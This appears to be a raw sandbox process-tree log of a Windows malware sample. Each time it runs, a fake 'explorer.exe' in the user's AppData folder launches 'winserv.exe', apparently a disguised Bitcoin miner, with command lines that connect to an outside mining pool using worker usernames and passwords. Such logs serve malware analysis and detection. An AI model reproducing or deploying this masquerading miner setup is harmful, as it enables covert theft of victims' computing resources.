C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4968
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4468
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2336
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2936
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4636
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2004
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5020
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3012
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3360
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3208
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4920
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1828
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3588
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1088
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2180
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:432
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4548
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3436
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:576
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3328
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5364
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3048
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4840
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2536
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:6044
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:744
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2264
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:112
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5644
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1500
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5700
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2200
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1928
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2820
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2064
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:468
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2804
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1212
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3000
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5076
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1596
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2932
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:6108
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3500
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:460
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:6068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3712
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1664
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3356
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4904
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3420
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4960
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4656
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:6132
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3180
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1896
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5864
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5904
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1608
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4964
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3068
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1468
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5312
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4696
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5888
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1068
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4616
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3436
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3184
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4244
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4528
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5820
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1952
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5532
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:784
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5644
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5732
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:6040
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2184
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:112
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3908
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1204
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1548
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2660
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:6076
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:820
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1212
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4928
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1412
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5520
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1572
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1684
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4988
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3816
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2248
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4752
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3880
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2604
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4468
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1848
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1912
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4888
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2780
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4872
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:876
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3352
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1608
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1828
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2644
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3688
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3404
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5956
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5888
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4108
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3900
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5824
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2016
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3436
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4528
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:716
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:540
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4544
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2060
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:232
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:568
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5596
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3932
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3292
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1984
-
-
-
